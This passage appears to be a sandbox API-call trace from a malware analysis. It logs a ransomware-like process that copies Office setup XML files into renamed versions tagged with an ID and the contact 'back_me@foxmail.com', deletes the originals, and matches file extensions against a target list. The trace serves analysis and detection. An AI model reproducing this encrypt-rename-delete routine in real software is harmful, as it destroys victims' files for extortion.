lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x91975, lpOverlapped=0x0) returned 1 [0040.317] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0040.688] ReadFile (in: hFile=0x1bc, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.688] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.765] SetEndOfFile (hFile=0x1b4) returned 1 [0041.403] CloseHandle (hObject=0x1b4) returned 1 [0041.446] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.446] SetEndOfFile (hFile=0x1bc) returned 1 [0041.451] CloseHandle (hObject=0x1bc) returned 1 [0041.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.452] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 1 [0041.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.452] lstrlenW (lpString=".doc") returned 4 [0041.452] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.452] lstrlenW (lpString=".docx") returned 5 [0041.452] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0041.452] lstrlenW (lpString=".pdf") returned 4 [0041.452] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.452] lstrlenW (lpString=".xls") returned 4 [0041.452] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.452] lstrlenW (lpString=".xlsx") returned 5 [0041.452] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0041.452] lstrlenW (lpString=".ppt") returned 4 [0041.452] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.452] lstrlenW (lpString=".zip") returned 4 [0041.452] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.452] lstrlenW (lpString=".rar") returned 4 [0041.452] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString=".bz2") returned 4 [0041.453] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString=".7z") returned 3 [0041.453] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.453] lstrlenW (lpString=".dbf") returned 4 [0041.453] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.453] lstrlenW (lpString=".1cd") returned 4 [0041.453] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.453] lstrlenW (lpString=".jpg") returned 4 [0041.453] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.453] lstrlenW (lpString=".doc") returned 4 [0041.453] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString=".docx") returned 5 [0041.453] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0041.453] lstrlenW (lpString=".pdf") returned 4 [0041.453] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString=".xls") returned 4 [0041.453] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString=".xlsx") returned 5 [0041.453] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0041.453] lstrlenW (lpString=".ppt") returned 4 [0041.453] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.453] lstrlenW (lpString=".zip") returned 4 [0041.453] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.453] lstrlenW (lpString=".rar") returned 4 [0041.453] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString=".bz2") returned 4 [0041.453] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.453] lstrlenW (lpString=".7z") returned 3 [0041.454] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.454] lstrlenW (lpString=".dbf") returned 4 [0041.454] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.454] lstrlenW (lpString=".1cd") returned 4 [0041.454] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0041.454] lstrlenW (lpString=".jpg") returned 4 [0041.454] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.454] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.454] lstrlenW (lpString="SETUP.XML") returned 9 [0041.454] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.072] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1988) returned 1 [0042.072] CloseHandle (hObject=0x208) returned 1 [0042.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 0x20 [0042.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.073] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.073] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.073] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.073] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.077] GetLastError () returned 0x0 [0042.077] ReadFile (in: hFile=0x208, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x7c4, lpOverlapped=0x0) returned 1 [0042.113] WriteFile (in: hFile=0x20c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0042.114] ReadFile (in: hFile=0x208, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.114] WriteFile (in: hFile=0x20c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.114] SetEndOfFile (hFile=0x20c) returned 1 [0042.115] CloseHandle (hObject=0x20c) returned 1 [0042.115] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.115] SetEndOfFile (hFile=0x208) returned 1 [0042.116] CloseHandle (hObject=0x208) returned 1 [0042.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.117] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 1 [0042.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.117] lstrlenW (lpString=".doc") returned 4 [0042.117] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.117] lstrlenW (lpString=".docx") returned 5 [0042.117] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.117] lstrlenW (lpString=".pdf") returned 4 [0042.117] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.117] lstrlenW (lpString=".xls") returned 4 [0042.117] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.117] lstrlenW (lpString=".xlsx") returned 5 [0042.117] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.117] lstrlenW (lpString=".ppt") returned 4 [0042.117] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.117] lstrlenW (lpString=".zip") returned 4 [0042.117] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.117] lstrlenW (lpString=".rar") returned 4 [0042.117] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.117] lstrlenW (lpString=".bz2") returned 4 [0042.117] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.117] lstrlenW (lpString=".7z") returned 3 [0042.117] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.118] lstrlenW (lpString=".dbf") returned 4 [0042.118] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.118] lstrlenW (lpString=".1cd") returned 4 [0042.118] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.118] lstrlenW (lpString=".jpg") returned 4 [0042.118] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.118] lstrlenW (lpString=".doc") returned 4 [0042.118] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.118] lstrlenW (lpString=".docx") returned 5 [0042.118] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.118] lstrlenW (lpString=".pdf") returned 4 [0042.118] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.118] lstrlenW (lpString=".xls") returned 4 [0042.118] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.118] lstrlenW (lpString=".xlsx") returned 5 [0042.118] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.118] lstrlenW (lpString=".ppt") returned 4 [0042.118] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.118] lstrlenW (lpString=".zip") returned 4 [0042.118] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.118] lstrlenW (lpString=".rar") returned 4 [0042.119] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.119] lstrlenW (lpString=".bz2") returned 4 [0042.119] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.119] lstrlenW (lpString=".7z") returned 3 [0042.119] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.119] lstrlenW (lpString=".dbf") returned 4 [0042.119] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.119] lstrlenW (lpString=".1cd") returned 4 [0042.119] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0042.119] lstrlenW (lpString=".jpg") returned 4 [0042.119] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.119] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.119] lstrlenW (lpString="Proof.XML") returned 9 [0042.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.120] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1347) returned 1 [0042.120] CloseHandle (hObject=0x208) returned 1 [0042.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 0x20 [0042.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.120] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.120] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.121] GetLastError () returned 0x0 [0042.121] ReadFile (in: hFile=0x208, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x543, lpOverlapped=0x0) returned 1 [0042.157] WriteFile (in: hFile=0x20c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x550, lpOverlapped=0x0) returned 1 [0042.158] ReadFile (in: hFile=0x208, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.158] WriteFile (in: hFile=0x20c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.158] SetEndOfFile (hFile=0x20c) returned 1 [0042.158] CloseHandle (hObject=0x20c) returned 1 [0042.159] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.159] SetEndOfFile (hFile=0x208) returned 1 [0042.160] CloseHandle (hObject=0x208) returned 1 [0042.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.160] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 1 [0042.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.160] lstrlenW (lpString=".doc") returned 4 [0042.160] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.160] lstrlenW (lpString=".docx") returned 5 [0042.160] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0042.160] lstrlenW (lpString=".pdf") returned 4 [0042.160] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.160] lstrlenW (lpString=".xls") returned 4 [0042.160] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString=".xlsx") returned 5 [0042.161] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0042.161] lstrlenW (lpString=".ppt") returned 4 [0042.161] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.161] lstrlenW (lpString=".zip") returned 4 [0042.161] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.161] lstrlenW (lpString=".rar") returned 4 [0042.161] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString=".bz2") returned 4 [0042.161] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString=".7z") returned 3 [0042.161] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.161] lstrlenW (lpString=".dbf") returned 4 [0042.161] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.161] lstrlenW (lpString=".1cd") returned 4 [0042.161] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.161] lstrlenW (lpString=".jpg") returned 4 [0042.161] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.161] lstrlenW (lpString=".doc") returned 4 [0042.161] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString=".docx") returned 5 [0042.161] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0042.161] lstrlenW (lpString=".pdf") returned 4 [0042.161] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.161] lstrlenW (lpString=".xls") returned 4 [0042.162] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.162] lstrlenW (lpString=".xlsx") returned 5 [0042.162] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0042.162] lstrlenW (lpString=".ppt") returned 4 [0042.162] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.162] lstrlenW (lpString=".zip") returned 4 [0042.162] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.162] lstrlenW (lpString=".rar") returned 4 [0042.162] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.162] lstrlenW (lpString=".bz2") returned 4 [0042.162] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.162] lstrlenW (lpString=".7z") returned 3 [0042.162] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.162] lstrlenW (lpString=".dbf") returned 4 [0042.162] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.162] lstrlenW (lpString=".1cd") returned 4 [0042.162] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0042.162] lstrlenW (lpString=".jpg") returned 4 [0042.162] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.162] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.162] lstrlenW (lpString="Proof.XML") returned 9 [0042.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.163] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1458) returned 1 [0042.163] CloseHandle (hObject=0x208) returned 1 [0042.163] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 0x20 [0042.163] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.163] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.163] SetFilePointerEx 